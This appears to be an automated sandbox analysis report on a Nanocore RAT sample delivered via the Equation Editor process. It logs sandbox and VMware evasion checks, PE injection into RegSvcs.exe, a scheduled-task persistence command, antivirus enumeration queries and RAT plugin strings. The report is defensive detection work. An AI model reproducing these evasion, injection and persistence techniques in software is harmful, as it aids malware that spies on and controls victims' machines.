Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3Show sources
Source: Yara matchFile source: 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2212Thread sleep time: -41804s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3004Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F0BB6 GetSystemInfo,
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 41804
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: vmware
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.483692366.000000000059F000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regionsShow sources
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
Allocates memory in foreign processesShow sources
Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processesShow sources
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: RegSvcs.exe, 00000009.00000002.690532668.00000000005D7000.00000004.00000020.sdmpBinary or memory string: ]Program Manager
Source: RegSvcs.exe, 00000009.00000002.691263704.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmpBinary or memory string: Program Manager``H
Source: RegSvcs.exe, 00000009.00000002.690564446.00000000005EF000.00000004.00000020.sdmpBinary or memory string: _Program Managerknown.
Source: RegSvcs.exe, 00000009.00000002.691263704.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: !Progman
Source: RegSvcs.exe, 00000009.00000002.691263704.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmpBinary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F2E76 GetSystemTimes,
Source: C:\Users\Public\vbc.exeCode function: 6_2_0013A2F6 GetUserNameW,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: vbc.exe, 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
